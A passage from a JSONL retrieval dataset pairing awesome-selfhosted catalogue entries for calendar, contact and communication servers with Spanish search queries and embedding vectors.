-0.01429, -0.04262, 0.02083, -0.00417, -0.04225, -0.02756, 0.00399, -0.04139, -0.01614, 0.0205, 0.00198]} +{"tipo": "pregunta", "herramienta": "Calendar & Contacts", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Calendar & Contacts", "tema": "calendar & contacts", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Calendar & Contacts: BaΓ―kal β€” Lightweight CalDAV and CardDAV server based on sabre/dav [GPL-3.0, PHP]. DAViCal β€” Server for calendar sharing (CalDAV) that uses a PostgreSQL database as a data store [GPL-2.0, PHP/deb]. Davis β€” A simple, dockerizable and fully translatable admin interface for sabre/dav based on Symfony 5 and Bootstrap 4, largely inspired by BaΓ―kal [MIT, PHP]. Keeper.sh β€” Calendar syncing tool that pulls and pushes events between calendar sources and destinations via iCal/ICS or OAuth, with support for anonymized busy/free events [AGPL-3.0, Docker]. Manage My Damn Life β€” Manage my Damn Life (MMDL) is a self-hosted front end for managing your CalDAV tasks and calendars [GPL-3.0, Nodejs/Docker]. Radicale β€” Simple calendar and contact server with extremely low administrative overhead [GPL-3.0, Python/deb]. SabreDAV β€” Open source CardDAV, CalDAV, and WebDAV framework and server [MIT, PHP]. Xandikos β€” Open source CardDAV and CalDAV server with minimal administrative overhead, backed by a Git repository [GPL-3.0, Python/deb].", "indexar": "cual es una alternativa libre y ligera para alojar mis calendarios en casa?", "v": [-0.03154, 0.01901, -0.03518, 0.10185, -0.12309, -0.04379, -0.0165, 0.04356, -0.2294, -0.05155, -0.05561, -0.26012, 0.01729, 0.04908, 0.22511, -0.04129, 0.04293, 0.00459, 0.07816, -0.03095, -0.12161, 0.12809, -0.11872, -0.03649, -0.12593, -0.10288, 0.15199, -0.03423, -0.09209, 0.05814, -0.07522, 0.04298, 0.14894, -0.02336, 0.09451, 0.12965, 0.10971, 0.07903, -0.08902, -0.06028, 0.08039, 0.06178, 0.05183, 0.0419, -0.06589, -0.09213, 0.01991, 0.10642, -0.07551, -0.04546, -0.13705, -0.0111, 0.02916, 0.09518, 0.07737, 0.00258, 0.09218, -0.09256, 0.02422, -0.02842, -0.04537, -0.00307, 0.06204, -0.05774, 0.01599, -0.04237, -0.10182, 0.01106, 0.04964, 0.00271, 0.01804, -0.00573, 0.02235, -0.00656, -0.08508, -0.03452, -0.0283, -0.041, -0.01938, 0.01577, 0.02171, -0.06103, 0.06572, 0.14621, -0.0007, -0.06943, 0.08379, -0.04834, 0.05901, 0.0299, 0.01977, 0.07263, 0.02058, 0.14324, 0.01889, -0.09259, 0.05142, 0.06285, -0.01758, 0.00189, 0.04723, -0.04329, -0.08473, 0.08145, 0.01805, -0.04435, -0.05857, 0.10987, -0.1041, 0.03373, 0.02972, 0.02796, -0.0824, 0.00134, 0.03995, 0.05765, -0.01438, 0.04854, -0.00421, -0.05084, -0.08643, -0.03238, -0.00538, -0.06547, -0.01233, 0.04182, 0.14601, -0.00192, -0.05492, 0.0498, -0.01462, -0.0236, -0.10011, 0.00085, -0.04889, 0.02675, -0.00797, -0.0225, 0.05843, 0.06009, 0.01681, 0.01518, 0.0362, -0.02738, 0.0407, -0.03637, -0.03109, -0.00944, -0.07228, -0.01129, -0.07953, 0.05482, -0.01636, 0.07175, -0.00305, -0.03404, -0.05792, 0.04695, -0.03736, 0.04724, 0.00945, -0.0176, -0.03428, -0.02804, -0.01335, -0.00218, 0.01837, -0.04272, -0.1012, 0.05679, 0.00741, 0.04657, 0.04604, -0.03113, -0.00715, -0.113, 0.0166, -0.02833, -0.10252, -0.05695, -0.02917, 0.08604, -0.07511, -0.00226, -0.00856, 0.01379, -0.02422, 0.05843, 0.02449, -0.01453, -0.07857, -0.01163, -0.046, -0.06402, -0.0111, -0.00234, 0.01547, -0.11933, 0.00856, -0.00147, -0.02517, -0.09636, 0.05799, 0.06891, 0.01237, 0.02337, -0.02323, 0.03926, 0.02696, 0.09891, 0.00643, -0.01435, 0.08675, 0.03134, -0.06001, 0.01128, 0.01237, 0.00914, 0.04887, 0.01065, 0.09541, 0.06282, -0.013, -0.004, -0.03374, 0.05087, 0.01322, -0.03593, 0.01984, 0.00577, -0.01334, -0.05059, 0.04021, 0.03473, -0.00117, -0.00594, 0.00703, 0.02982, 0.03446, 0.01645, 0.00201, 0.03414, 0.03767, 0.0639, -0.03755, 0.03084, -0.02544, -0.02168, -0.00762, -0.00641, -0.00269, 0.03523, 0.04281, 0.00346, 0.03342, 0.05762]} +{"tipo": "pregunta", "herramienta": "Calendar & Contacts", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Calendar & Contacts", "tema": "calendar & contacts", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Calendar & Contacts: BaΓ―kal β€” Lightweight CalDAV and CardDAV server based on sabre/dav [GPL-3.0, PHP]. DAViCal β€” Server for calendar sharing (CalDAV) that uses a PostgreSQL database as a data store [GPL-2.0, PHP/deb]. Davis β€” A simple, dockerizable and fully translatable admin interface for sabre/dav based on Symfony 5 and Bootstrap 4, largely inspired by BaΓ―kal [MIT, PHP]. Keeper.sh β€” Calendar syncing tool that pulls and pushes events between calendar sources and destinations via iCal/ICS or OAuth, with support for anonymized busy/free events [AGPL-3.0, Docker]. Manage My Damn Life β€” Manage my Damn Life (MMDL) is a self-hosted front end for managing your CalDAV tasks and calendars [GPL-3.0, Nodejs/Docker]. Radicale β€” Simple calendar and contact server with extremely low administrative overhead [GPL-3.0, Python/deb]. SabreDAV β€” Open source CardDAV, CalDAV, and WebDAV framework and server [MIT, PHP]. Xandikos β€” Open source CardDAV and CalDAV server with minimal administrative overhead, backed by a Git repository [GPL-3.0, Python/deb].", "indexar": "necesito sincronizar mis eventos entre diferentes fuentes de calendario sin pagar licencias.", "v": [0.07561, -0.02857, -0.11141, -0.14959, 0.04656, -0.16917, -0.04602, -0.01621, -0.16381, -0.11967, 0.04871, -0.10605, 0.01425, -0.05976, 0.09506, 0.0829, -0.02172, -0.05988, 0.12959, 0.02113, -0.03312, -0.03273, 0.02476, -0.11497, -0.09647, -0.0545, 0.05648, -0.10082, -0.15597, 0.1012, -0.08181, 0.0324, 0.15669, 0.01655, 0.07195, 0.02897, 0.04009, 0.09786, -0.09889, -0.10981, -0.02531, 0.10677, -0.07158, -0.02834, -0.12185, -0.1437, -0.04461, 0.13593, -0.01184, -0.093, 0.04095, -0.00406, -0.07259, -0.06443, 0.00821, -0.07604, 0.01489, -0.0615, 0.02705, 0.02261, -0.00484, -0.02419, 0.00689, -0.01245, -0.01282, 0.10497, 0.04985, 0.01555, 0.07581, -0.02714, -0.08676, -0.05768, 0.09712, -0.00448, -0.03035, -0.11092, 0.02077, -0.06808, -0.10127, 0.18823, -0.01209, 0.0707, 0.05494, 0.02216, -0.09728, 0.01785, 0.12283, 0.10874, 0.10646, 0.07382, 0.00945, 0.15506, -0.00257, 0.06481, 0.03056, -0.06917, 0.02626, -0.04039, -0.06254, 0.02203, -0.08505, 0.01146, -0.02794, -0.09838, -0.03785, 0.06095, 0.10741, -0.00629, 0.0405, 0.09812, -0.07926, 0.06519, -0.05509, -0.02051, -0.02054, 0.08835, 0.09435, -0.01202, 0.03559, 0.03386, -0.01879, -0.05228, 0.06829, -0.01998, 0.05728, 0.0434, 0.08815, 0.1708, -0.00854, -0.03508, 0.01529, -0.02064, 0.02181, 0.05339, 0.0142, -0.00431, -0.04164, -0.04761, -0.03764, -0.00861, 0.01126, 0.0112, 0.05612, 0.0748, 0.07188, 0.03579, -0.05909, -0.06475, -0.11748, -0.04361, -0.03064, -0.01269, -0.02189, 0.0371, -0.12745, -0.03981, -0.09, -0.01428, 0.0302, 0.00092, 0.02489, 0.01624, -0.03935, -0.04447, 0.01869, -0.02743, -0.03015, -0.01646, -0.0301, 0.06207, 0.01494, 0.02623, 0.04907, 0.00919, 0.04884, -0.04582, 0.00969, -0.08745, -0.05549, -0.00022, -0.05605, 0.05235, -0.04638, -0.00804, 0.01268, 0.0113, 0.00614, 0.04912, 0.02456, 0.02201, -0.00888, -0.00515, 0.04959, -0.06732, 0.05942, 0.00556, 0.01984, -0.03205, -0.07044, -0.05853, 0.03923, 0.03338, -0.01876, 0.06254, 0.08669, -0.04246, -0.05205, 0.09985, -0.01491, 0.0078, -0.01524, 0.01106, 0.01869, 0.01114, -0.0256, -0.01759, -0.00948, -0.00228, 0.06381, -0.04927, 0.05966, 0.01024, -0.03361, 0.0007, -0.00918, -0.04923, 0.04898, -0.01911, 0.07347, 0.00696, -0.02151, 0.07587, -0.04276, 0.01448, 0.01351, 0.02955, -0.01664, 0.02955, 0.04895, 0.00343, -0.04335, 0.01802, 0.05023, -0.00846, -0.04971, -0.03379, -0.0448, -0.08055, -0.00229, -0.0031, 0.07125, 0.0598, 0.0598, 0.03043, 0.02064, 0.00534]} +{"tipo": "pregunta", "herramienta": "Calendar & Contacts", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Calendar & Contacts", "tema": "calendar & contacts", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Calendar & Contacts: BaΓ―kal β€” Lightweight CalDAV and CardDAV server based on sabre/dav [GPL-3.0, PHP]. DAViCal β€” Server for calendar sharing (CalDAV) that uses a PostgreSQL database as a data store [GPL-2.0, PHP/deb]. Davis β€” A simple, dockerizable and fully translatable admin interface for sabre/dav based on Symfony 5 and Bootstrap 4, largely inspired by BaΓ―kal [MIT, PHP]. Keeper.sh β€” Calendar syncing tool that pulls and pushes events between calendar sources and destinations via iCal/ICS or OAuth, with support for anonymized busy/free events [AGPL-3.0, Docker]. Manage My Damn Life β€” Manage my Damn Life (MMDL) is a self-hosted front end for managing your CalDAV tasks and calendars [GPL-3.0, Nodejs/Docker]. Radicale β€” Simple calendar and contact server with extremely low administrative overhead [GPL-3.0, Python/deb]. SabreDAV β€” Open source CardDAV, CalDAV, and WebDAV framework and server [MIT, PHP]. Xandikos β€” Open source CardDAV and CalDAV server with minimal administrative overhead, backed by a Git repository [GPL-3.0, Python/deb].", "indexar": "busco un servidor de contactos y calendario que funcione como un reemplazo a Google Calendar", "v": [0.17253, 0.01299, -0.19085, -0.12984, 0.00028, -0.18213, 0.07153, -0.02122, -0.02877, -0.08639, -0.14404, -0.08988, -0.01226, 0.02208, 0.0689, -0.00179, 0.06602, -0.0753, 0.00351, -0.00511, -0.04384, 0.05148, 0.02176, -0.00224, -0.06986, 0.00217, 0.01569, -0.14667, -0.05898, -0.00081, 0.06734, -0.10872, -0.01273, -0.03151, -0.02375, -0.05656, 0.00279, 0.07046, -0.1636, -0.11746, 0.02787, -0.04254, -0.13527, 0.00428, -0.16024, -0.01276, 0.11508, 0.00889, -0.02334, -0.06138, -0.14971, -0.1034, -0.08647, 0.03689, -0.03732, 0.04143, 0.14471, -0.12225, 0.00464, -0.02677, -0.04564, -0.0521, 0.0013, 0.05819, 0.10349, 0.01054, 0.05844, -0.032, -0.01157, -0.00759, -0.13861, 0.01943, 0.00261, -0.02466, 0.10611, 0.02668, 0.09936, 0.0607, -0.11319, 0.03058, 0.01183, -0.04307, -0.00769, 0.16326, -0.12265, 0.00692, 0.07688, -0.01701, -0.0346, -0.04988, 0.05543, 0.10808, -0.08213, 0.12331, 0.01906, 0.02931, 0.0672, -0.09105, -0.02687, -0.03363, 0.11121, 0.04992, -0.04629, 0.04108, -0.04284, 0.04565, 0.07247, 0.04895, 0.0251, 0.03191, 0.01886, -0.1519, -0.04078, -0.06381, -0.0404, 0.04439, 0.0299, -0.01679, 0.03209, -0.00655, -0.14455, 0.02266, -0.02533, 0.03853, 0.03144, 0.08914, 0.03405, 0.05655, 0.05774, -0.03279, -0.01753, -0.05654, -0.0532, -0.0246, -0.05226, 0.14773, 0.03593, 0.04692, -0.00756, -0.00535, 0.00104, 0.0268, 0.08727, -0.05382, 0.09242, 0.03543, 0.0821, -0.02373, -0.08512, -0.02314, -0.03819, 0.01471, -0.02509, 0.10383, -0.07749, -0.0593, -0.07112, -0.02819, 0.02217, -0.00483, -0.01509, -0.00779, -0.01034, 0.05635, 0.01189, -0.01184, -0.01663, -0.01266, 0.04577, 0.04552, -0.03106, 0.02479, 0.03327, -0.14062, -0.0385, -0.01085, 0.01398, 0.00052, 0.09921, 0.0284, -0.06104, 0.07036, -0.02679, 0.02324, -0.06577, -0.09076, -0.06581, 0.01557, 0.00307, 0.00326, 0.05831, 0.00748, 0.02007, 0.02886, 0.03971, -0.04032, -0.03615, -0.03017, -0.06179, -0.05408, 0.01261, -0.03307, 0.01605, 0.02766, -0.034, 0.0229, -0.02609, 0.04479, -0.04008, 0.05203, 0.01825, -0.04621, 0.09892, -0.00025, -0.04765, -0.04816, 0.09573, -0.07182, 0.04767, -0.00669, 0.05686, 0.03588, 0.03697, 0.0082, -0.0404, 0.01384, 0.05149, -0.02275, 0.06659, 0.01946, -0.01887, 0.02591, 0.00353, -0.0749, 0.05832, 0.03291, -0.00165, -0.01011, -0.03321, -0.05239, -0.0056, 0.04421, -0.01384, 0.02192, -0.04548, -0.04841, -0.04268, 0.00899, -0.00136, -0.03913, -0.03454, 0.02009, 0.05326, -0.02441, 0.00431, -0.04]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: AnyCable β€” Realtime server for reliable two-way communication over WebSockets, Server-sent events, etc [MIT, Go/Docker]. Apprise β€” Apprise allows you to send a notification to almost all of the most popular notification services available to us today such as: Telegram, Discord, Slack, Amazon SNS, Gotify, etc [MIT, Python/Docker/deb]. Centrifugo β€” Language-agnostic real-time messaging (Websocket or SockJS) server [MIT, Go/Docker/K8S]. Chitchatter β€” Peer-to-peer chat app that is serverless, decentralized, and ephemeral [GPL-2.0, Nodejs]. Conduit β€” A simple, fast, and reliable chat server powered by Matrix [Apache-2.0, Rust]. Continuwuity β€” Community-driven Matrix homeserver, the continuation of conduwuit focusing on user experience and new features (fork of Conduit) [Apache-2.0, Rust/Docker/K8S/deb]. Databag β€” Federated, end-to-end encrypted messaging service for the web, iOS, and Android, supporting text, photos, video, and WebRTC video and audio calls [Apache-2.0, Docker].", "indexar": "que servidor de mensajerΓ­a en tiempo real sirve para chatear con otras personas remotamente", "v": [0.09516, 0.0599, -0.10759, -0.05424, -0.05637, -0.09777, 0.0425, -0.00995, 0.09523, 0.02297, -0.08015, -0.04102, 0.14718, -0.05508, 0.06952, 0.09794, 0.16583, 0.10348, 0.12809, 0.0043, 0.12147, 0.00361, 0.04881, -0.00233, -0.13621, 0.00648, 0.12801, -0.06247, -0.04421, 0.12693, 0.07428, -0.01736, 0.04833, -0.01193, 0.04262, -0.01214, -0.00063, 0.05714, -0.1288, 0.07688, 0.18971, 0.01121, -0.08699, 0.05339, 0.04321, -0.00529, -0.02859, -0.04834, 0.02235, 0.027, -0.13103, -0.03158, -0.09901, 0.03747, -0.06267, 0.041, 0.17934, -0.09031, 0.07291, -0.13625, -0.14863, -0.02383, -0.04068, -0.0671, 0.07098, -0.01758, -0.02934, -0.08079, -0.14468, -0.05103, -0.10162, -0.0452, 0.01125, 0.01879, 0.01452, 0.01243, -0.08694, 0.07318, 0.00209, 0.04739, 0.03551, -0.08937, -0.03704, 0.0349, -0.04911, -0.06319, 0.07073, -0.04323, 0.04037, -0.01392, 0.12166, 0.09512, -0.03079, 0.07726, 0.05424, -0.03387, 0.03019, -0.1086, 0.007, 0.0544, 0.10989, -0.01664, -0.05318, 0.04384, -0.03675, 0.04657, 0.08684, -0.12571, 0.06254, -0.03162, 0.07404, -0.05906, 0.03048, -0.0118, -0.03467, -0.09746, 0.03412, -0.07376, 0.06965, 0.01124, -0.1227, -0.01134, 0.02571, 0.02193, 0.0397, -0.01159, -0.01152, -0.03698, 0.06881, -0.04324, -0.02189, -0.05369, -0.09665, -0.06542, -0.01167, 0.0426, 0.00786, -0.05239, 0.01477, -0.0172, 0.0266, 0.07943, -0.05521, -0.03164, 0.05862, 0.0364, 0.01841, -0.14329, -0.07044, 0.02842, 0.09068, 0.01543, -0.01541, 0.01111, -0.07469, -0.04079, -0.02051, -0.00839, -0.02441, 0.08426, 0.04109, 0.01927, 0.01681, 0.03865, 0.00352, -0.07647, 0.0092, 0.05193, 0.07153, 0.06106, -0.07233, 0.01632, 0.077, -0.05039, -0.01522, -0.00098, -0.02827, -0.04876, -0.03437, -0.06994, -0.02747, -0.01022, 0.02606, 0.00022, 0.0411, 0.03218, -0.06308, -0.01261, 0.01476, 0.04236, 0.02912, -0.00954, -0.07172, 0.08571, -0.02736, -0.00834, -0.06759, -0.04195, 0.00068, -0.03243, -0.02725, -0.0968, 0.00165, 0.0092, -0.04243, 0.05546, -0.04245, 0.05683, -0.0235, 0.04645, 0.00178, -0.04134, 0.09291, -0.00625, -0.02508, 0.00984, 0.11398, -0.10815, -0.00457, 0.0248, -0.03962, -0.00124, 0.00248, -0.02209, -0.02319, 0.07062, 0.05123, 0.05702, 0.06208, 0.01992, -0.04852, 0.05328, -0.00637, -0.03375, 0.06538, -0.03502, 0.01793, -0.07519, -0.03614, -0.10268, -0.00948, 0.06406, -0.04565, -0.01158, 0.01001, -0.06241, -0.084, -0.00651, -0.06516, -0.06123, -0.07222, -0.02059, 0.02443, 0.00101, 0.03111, -0.03387]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: AnyCable β€” Realtime server for reliable two-way communication over WebSockets, Server-sent events, etc [MIT, Go/Docker]. Apprise β€” Apprise allows you to send a notification to almost all of the most popular notification services available to us today such as: Telegram, Discord, Slack, Amazon SNS, Gotify, etc [MIT, Python/Docker/deb]. Centrifugo β€” Language-agnostic real-time messaging (Websocket or SockJS) server [MIT, Go/Docker/K8S]. Chitchatter β€” Peer-to-peer chat app that is serverless, decentralized, and ephemeral [GPL-2.0, Nodejs]. Conduit β€” A simple, fast, and reliable chat server powered by Matrix [Apache-2.0, Rust]. Continuwuity β€” Community-driven Matrix homeserver, the continuation of conduwuit focusing on user experience and new features (fork of Conduit) [Apache-2.0, Rust/Docker/K8S/deb]. Databag β€” Federated, end-to-end encrypted messaging service for the web, iOS, and Android, supporting text, photos, video, and WebRTC video and audio calls [Apache-2.0, Docker].", "indexar": "con que puedo montar una soluciΓ³n de chat descentralizada sin necesidad de un servidor central", "v": [-0.0538, 0.02856, -0.19098, -0.08132, -0.15296, -0.15945, -0.02959, -0.0207, -0.06508, -0.0267, -0.08739, -0.0662, -0.04358, -0.04737, 0.03741, 0.06475, 0.03061, -0.05629, 0.03653, -0.01124, 0.00886, -0.11395, 0.12427, -0.04534, -0.06771, 0.14217, 0.01555, -0.08334, -0.06845, 0.02512, 0.04016, -0.01109, 0.0241, 0.13495, 0.05401, -0.13967, -0.03731, 0.05882, -0.13582, 0.00699, -0.03157, 0.01357, -0.07007, 0.03909, 0.07368, -0.01396, 0.11934, -0.11156, 0.00531, -0.0221, -0.08226, -0.10911, -0.13799, -0.06322, -0.03444, -0.00647, 0.04432, -0.00249, 0.12028, -0.10842, -0.17461, 0.10424, 0.0206, -0.02857, 0.09297, -0.00917, -0.15995, -0.00535, -0.07854, -0.0344, -0.08472, 0.01034, 0.01143, -0.06976, 0.03915, 0.01041, -0.11417, -0.03916, 0.0478, 0.05024, 0.08828, 0.04738, 0.03943, 0.09338, -0.07111, -0.05286, 0.0845, -0.0427, 0.06007, 0.02939, -0.0053, 0.07415, 0.01432, 0.02953, 0.05419, -0.13599, 0.08592, -0.00789, 0.03143, -0.01418, 0.10217, 0.01546, -0.03804, 0.08605, 0.0481, -0.08995, 0.18962, -0.10253, 0.02998, -0.05269, 0.04263, 0.04411, 0.03417, -0.01369, -0.10194, -0.0591, -0.02781, 0.12279, -0.01853, 0.05154, -0.04327, -0.00985, 0.07477, -0.03369, 0.01245, -0.02556, 0.11916, 0.00853, 0.03008, 0.03839, -0.055, -0.03261, -0.08805, -0.07247, 0.00915, 0.03305, 0.0583, -0.02334, -0.01771, 0.00267, -0.00545, -0.02499, -0.05219, -0.0455, 0.10743, 0.02788, 0.06725, -0.11309, -0.0585, 0.04485, 0.04162, 0.03258, 0.04358, 0.02622, -0.08519, -0.00926, 0.00577, -0.07142, 0.03716, 0.09617, -0.00901, 0.05452, -0.03672, 0.07276, -0.00056, -0.0401, -0.03193, 0.04063, 0.04607, 0.02882, -0.03593, 0.00025, 0.01154, -0.03934, 0.08783, 0.03335, -0.04635, -0.07342, 0.01762, -0.01826, -0.04071, -0.00259, -0.06764, 0.00733, -0.04902, -0.02113, -0.03974, -0.00423, 0.03289, -0.016, -0.01478, -0.03843, -0.07268, 0.06648, 0.05514, -0.08455, -0.04124, 0.00993, -0.02011, -0.04593, -0.04922, 0.00012, -0.00115, -0.00629, -0.0489, 0.00019, -0.11911, 0.08013, 0.01354, 0.04174, -0.00718, -0.0286, 0.10323, -0.04659, 0.00554, -0.01974, 0.07073, -0.02188, -0.02236, 0.01032, -0.00667, 0.04183, 0.06125, 0.0401, 0.01007, 0.01093, 0.0395, 0.05185, 0.07634, 0.03599, -0.07954, 0.04302, 0.01323, -0.02281, 0.03881, 0.03493, 0.03175, -0.06667, -0.01454, -0.05099, 0.00826, 0.11067, -0.02711, 0.01041, 0.03214, -0.06453, -0.07502, 0.00594, -0.03925, -0.02458, -0.01578, -0.00815, 0.03796, -0.03136, 0.02859, -0.05278]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: AnyCable β€” Realtime server for reliable two-way communication over WebSockets, Server-sent events, etc [MIT, Go/Docker]. Apprise β€” Apprise allows you to send a notification to almost all of the most popular notification services available to us today such as: Telegram, Discord, Slack, Amazon SNS, Gotify, etc [MIT, Python/Docker/deb]. Centrifugo β€” Language-agnostic real-time messaging (Websocket or SockJS) server [MIT, Go/Docker/K8S]. Chitchatter β€” Peer-to-peer chat app that is serverless, decentralized, and ephemeral [GPL-2.0, Nodejs]. Conduit β€” A simple, fast, and reliable chat server powered by Matrix [Apache-2.0, Rust]. Continuwuity β€” Community-driven Matrix homeserver, the continuation of conduwuit focusing on user experience and new features (fork of Conduit) [Apache-2.0, Rust/Docker/K8S/deb]. Databag β€” Federated, end-to-end encrypted messaging service for the web, iOS, and Android, supporting text, photos, video, and WebRTC video and audio calls [Apache-2.0, Docker].", "indexar": "quΓ© alternativa a WhatsApp permite videollamadas y es autohospedada", "v": [-0.01554, -0.01579, -0.12752, -0.00227, -0.15524, 0.02768, 0.00882, -0.18887, -0.01253, -0.08199, -0.00914, -0.30064, -0.02572, 0.05911, 0.00133, 0.13691, 0.07221, -0.0727, 0.1081, -0.10252, 0.04886, -0.08082, -0.12918, -0.14466, -0.08569, 0.05485, 0.00719, 0.05521, -0.11986, -0.03836, 0.0445, -0.00222, 0.07104, 0.03974, -0.07964, 0.09389, 0.00646, 0.00284, 0.04568, 0.0611, 0.01304, 0.09117, -0.03215, -0.02213, 0.01645, -0.03192, -0.01895, -0.02318, -0.06866, 0.08234, 0.02805, 0.03835, -0.00537, 0.06397, 0.02561, -0.0285, 0.26383, -0.1078, 0.00994, 0.0334, -0.02307, 0.04185, -0.01051, 0.09761, 0.04042, 0.05527, -0.01288, 0.05617, -0.05523, 0.09192, -0.02388, -0.0159, 0.08215, 0.04843, 0.00725, -0.03333, -0.22101, 0.09376, -0.09315, 0.0074, 0.02807, -0.01171, 0.10433, 0.01365, -0.00828, 0.03633, -0.02721, 0.0123, 0.05405, -0.00691, 0.00472, 0.1243, 0.11007, 0.08509, -0.01136, -0.04816, 0.02943, 0.03554, -0.02259, -0.02935, 0.08274, -0.10719, -0.06288, 0.04935, 0.03355, 0.0526, 0.00785, 0.03178, -0.03687, -0.05196, 0.04458, 0.09184, -0.01445, 0.08271, 0.07134, -0.02999, 0.03909, 0.06193, -0.00636, -0.08283, 0.00189, 0.05911, 0.01463, -0.07075, -0.01653, 0.0745, -0.0616, 0.09918, -0.08121, 0.07575, 0.058, -0.13005, -0.04144, -0.07134, -0.04216, -0.00484, -0.00615, 0.09844, 0.05469, 0.00891, 0.11422, -0.02717, 0.05983, -0.08348, 0.04684, -0.04627, 0.02526, -0.06147, -0.02385, 0.0889, 0.031, -0.02936, -0.09861, -0.02351, 0.01033, 0.0134, 0.00467, -0.09281, -0.01496, 0.05034, 0.02742, -0.07549, -0.03909, 0.03757, -0.0328, -0.00323, 0.02715, -0.03254, -0.08153, -0.09522, 0.05412, 0.02935, 0.02478, -0.03788, -0.01252, 0.06491, 0.06605, 0.00827, 0.02234, -0.05072, -0.03911, -0.01789, 0.03075, 0.00825, 0.03731, -0.01667, -0.06712, -0.00161, -0.05509, 0.01098, -0.10247, 0.01136, -0.02388, -0.04326, 0.01733, -0.05579, -0.05374, -0.09312, -0.01542, 0.01325, -0.03279, -0.02549, -0.01909, -0.01645, -0.05035, -0.06052, 0.00405, -0.00892, 0.02902, 0.01593, -0.02981, 0.03034, 0.01357, 0.02909, 0.02034, 0.0069, 0.05, 0.05198, -0.03162, -0.0145, 0.03646, -0.05249, 0.04893, 0.00605, 0.00314, 0.11996, -0.01526, 0.01972, -0.0759, -0.04201, 0.02933, -0.06433, -0.03809, 0.00695, 0.04447, -0.03709, -0.02452, -0.01383, -0.03973, 0.0046, 0.04575, 0.00026, 0.03495, 0.05629, -0.03501, 0.00012, -0.03842, 0.0101, 0.04884, -0.04193, 0.03751, 0.00908, -0.00688, 0.05151, 0.00669, 0.03944]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Element β€” Fully-featured Matrix client for Web, iOS & Android [Apache-2.0, Nodejs]. GlobaLeaks β€” Whistleblowing software enabling anyone to easily set up and maintain a secure reporting platform [AGPL-3.0, Python/deb/Docker]. GNUnet β€” Software framework for decentralized, peer-to-peer networking [GPL-3.0, C]. Gotify β€” Notification server with Android and CLI clients (alternative to PushBullet) [MIT, Go/Docker]. Hyphanet β€” Anonymously share files, browse and publish _freesites_ (web sites accessible only through Hyphanet) and chat on forums [GPL-2.0, Java]. Jami β€” Universal communication platform which preserves the user's privacy and freedoms [GPL-3.0, C++]. Live Helper Chat β€” Live Support chat for your website [Apache-2.0, PHP]. Mumble β€” Low-latency, high quality voice/text chat software [BSD-3-Clause, C++/deb]. Notifo β€” Multichannel notification server with support for Email, Mobile Push, Web Push, SMS, messaging and a javascript plugin [MIT, C#].", "indexar": "que programa sirve para tener chats de voz con baja latencia y buena calidad?", "v": [-0.04769, -0.0078, -0.17389, 0.03541, -0.06331, -0.13391, 0.03478, -0.05219, -0.0108, -0.1676, -0.08413, -0.11553, -0.05846, 0.12743, 0.03063, 0.09825, 0.03567, 0.02727, 0.06038, 0.03693, 0.12975, 0.00167, -2e-05, -0.0364, -0.11302, 0.1122, 0.14686, -0.05933, -0.05264, 0.23389, 0.00591, -0.09574, 0.03407, 0.03148, -0.00284, 0.01255, -0.00796, -0.075, 0.042, 0.09453, 0.00204, 0.06368, 0.02707, -0.02572, 0.12633, -0.0347, -0.04538, 0.09487, -0.02914, -0.01043, -0.11347, -0.0577, 0.08904, 0.06664, -0.01266, -0.06171, 0.00952, -0.0905, -0.01775, -0.13275, -0.05853, -0.06046, 0.02265, -0.0894, 0.06984, 0.02015, 0.0519, -0.04655, 0.00054, 0.0107, -0.01886, -0.01673, 0.04633, -0.01586, -0.00427, -0.03158, -0.17177, -0.00231, 0.00652, -0.01827, 0.11, -0.10327, -0.00167, 0.08566, -0.10199, 0.00772, 0.05946, -0.07052, 0.04491, 0.00476, -0.01702, 0.09461, 0.04338, 0.00482, 0.03956, -0.03793, 0.1001, 0.06678, 0.04232, 0.01473, 0.1082, -0.04705, -0.09866, 0.08388, -0.00639, 0.06607, 0.10297, -0.12053, 0.05909, 0.07174, 0.04326, -0.01264, 0.00024, -0.05629, -0.08887, -0.06878, -0.04013, -0.08103, 0.02101, 0.00933, 0.01177, 0.04965, -0.03801, -0.02527, 0.03334, -0.03501, -0.01453, -0.03304, 0.04115, 0.08905, -0.01715, 0.02891, -0.03624, -0.12458, 0.01788, -0.03198, 0.05445, 0.06743, -0.03063, -0.05163, 0.00669, 0.07086, 0.01394, -0.01874, 0.09, 0.01502, -0.0215, -0.16621, 0.03033, 0.05925, 0.05031, 0.05729, 0.05498, 0.0404, -0.07248, 0.00429, 0.04925, -0.07421, 0.02515, 0.07453, -0.01534, -0.02935, -0.07784, -0.03134, 0.04117, -0.03404, -0.01927, 0.01159, 0.07389, 0.0319, -0.02861, 0.05301, 0.11473, -0.1157, -0.06434, 0.011, -0.0163, -0.03463, 0.0606, -0.13299, -0.07597, -0.03625, 0.06873, 0.03974, 0.03123, -0.02598, -0.06985, -0.00075, 0.03338, 